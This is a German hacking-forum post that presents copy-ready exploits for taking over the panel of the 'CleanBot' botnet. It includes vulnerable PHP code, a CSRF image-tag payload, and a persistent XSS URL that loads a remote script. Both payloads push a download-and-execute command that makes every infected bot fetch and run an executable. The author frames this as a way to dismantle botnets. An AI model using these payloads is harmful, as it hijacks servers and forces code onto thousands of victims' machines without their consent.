Thema: [Paper] CleanBot exploited
Einzelnen Beitrag anzeigen
Alt 30.11.2010, 17:54   #1 (permalink)
SFX
technischer Admin + DevTeam Leiter
 
Benutzerbild von SFX
 
Registriert seit: 19.12.2007
Beiträge: 7.285

SFX eine Nachricht über ICQ schicken
Standard CleanBot exploited
Ich weiß ich weiß, man tritt nicht auf die ein die schon am Boden liegen nachdem ich gestern schon den Stealer der "Entwickler" mehrfach exploited hab..

ich konnte trotzdem nicht widerstehen und habe mir nun den CleanBot vorgenommen

Das Panel vom Bot ist leider nicht ganz so oft verwundbar wie der Stealer.. was aber nicht auf einen besseren Programmierstil zurückzuführen ist (im Gegenteil, der ist noch schlechter), sondern einfach darauf dass das Panel viel weniger kann und sehr einfach aufgebaut ist..

naja.. das muss ich irgendwie wieder gut machen..

hmm.. :/

ah, ich hab was..

Auch wenn ich nicht viel von c&p halte, solange man es benutzt um BotNets aufzulösen, finde ich es vertretbar..

deswegen gibt es die Exploits zum nachkopieren und Narren sicher..

BotNet per pn übernehmen
Voraussetzung:
  • Ihr müsst wissen wo das Panel liegt
  • Der Admin muss einen Post/eine PN/eine Website von euch lesen
    • Der Admin muss in dem Moment eingeloggt sein



Verwundbarer Code:
PHP-Code:
<?php
if(isset($_GET['sendcommand'])){
$datei_handle=fopen("command.txt",w);
fwrite($datei_handle,$_GET["command"]);
fclose($datei_handle);
Exploit:
Code:
[IMG.]http://kiddy.example.com/commands.php?command=%5Bdl%5D%20www.google.de/patch.exe[/.IMG]
Sobald der Admin die PN öffnet und zu dem Zeitpunkt eingeloggt ist..

ist der Task in der Liste und alle Bots laden die exe..
BotNet per persistentem XSS übernehmen
Voraussetzung:
  • Ihr müsst wissen wo das Panel liegt
  • Der Admin muss sich zu einem beliebigen Zeitpunkt ins Panel einloggen


Im Browser aufrufen
Code:
http://kiddy.example.com/bot.php?hwid=sfx%20pwns&pcname=sfx%20pwns<script src=http://yourserver.com/xss.js></script>&antwort=sfx%20pwns&os=sfx%20pwns
xss.js
Code:
(new Image).src = "http://kiddy.example.com/commands.php?command=%5Bdl%5D%20www.google.de/patch.exe";
Die rot markierten Stellen müssen entsprechend geändert werden
Meine persönliche Bitte:
Unterdrückt den Drang da einen Stealer rein zu kopieren sondern lasst es bei einer Datei die den User drauf aufmerksam macht dass der PC infiziert ist..

Don't be a kiddy

Programmers are tools for converting caffeine into code
Zitat:
Zitat von AskerKing
was ist denn pi?
[19:17:37] KONTOR-Ayu: SFX findet auch bei jeder frau die backdoor
Geändert von SFX (30.11.2010 um 18:52 Uhr).
SFX ist offline   Mit Zitat antworten